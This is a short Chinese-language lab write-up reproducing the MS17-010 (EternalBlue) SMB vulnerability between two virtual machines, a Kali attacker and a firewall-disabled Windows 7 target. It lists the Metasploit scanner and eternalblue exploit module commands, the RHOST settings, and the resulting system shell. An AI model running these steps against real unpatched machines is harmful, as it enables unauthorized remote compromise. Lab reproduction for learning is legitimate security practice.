MS17-010漏洞复现

实验环境:
kali (虚拟机)
Windows 7 x64(虚拟机)

1、查看两台机器的IP地址,且关闭win7防火墙
MS17-010漏洞复现
MS17-010漏洞复现
可见win7 IP为: 192.168.15.129
kali 为:192.168.15.130

2、使用mdfconsole
在此之前需要进行端口扫描,需要确保win7的445端口开放,知道自己的没有关闭此端口,所以在这不进行端口确认了,像验证的可以利用nmap进行扫描,具体指令百度康康。

启动 mdfconsole:
-msfconsole

使用如下命令:

  • use auxiliary/scanner/smb/smb_ms17_010
  • show targets
  • show options

第一句为利用auxiliary/scanner/smb/smb_ms17_010进漏洞分析,看看这个445端口是否能被入侵。
先使用show options查看这个模块的选项,在Required那列中,yes的是必填的,no是选填的,默认已经写好了大部分的参数,但还是需要手动设置一下RHOSTS的参数,即攻击的主机ip,这里我们写被攻击的win7的 ip。
MS17-010漏洞复现
设置RHOSTS 为win7的地址,之后执行run。看到结果绿色加号那行,主机可能存在MS17-010漏洞。确认可以通过MS17-010漏洞入侵。
MS17-010漏洞复现
使用攻击模块 use exploit/windows/smb/ms17_010_eternalblue,
用show targets 查看该模块适用的主机系统
show options 查看选项。
MS17-010漏洞复现
只要设置RHOST为被攻击主机地址即可。
set RHOST xxx.xxx.xxx.xxx(被攻击主机地址)
执行run
MS17-010漏洞复现
当结束后,看到C:\Windows\system32> 即渗透成功,可以进行其余有趣的操作。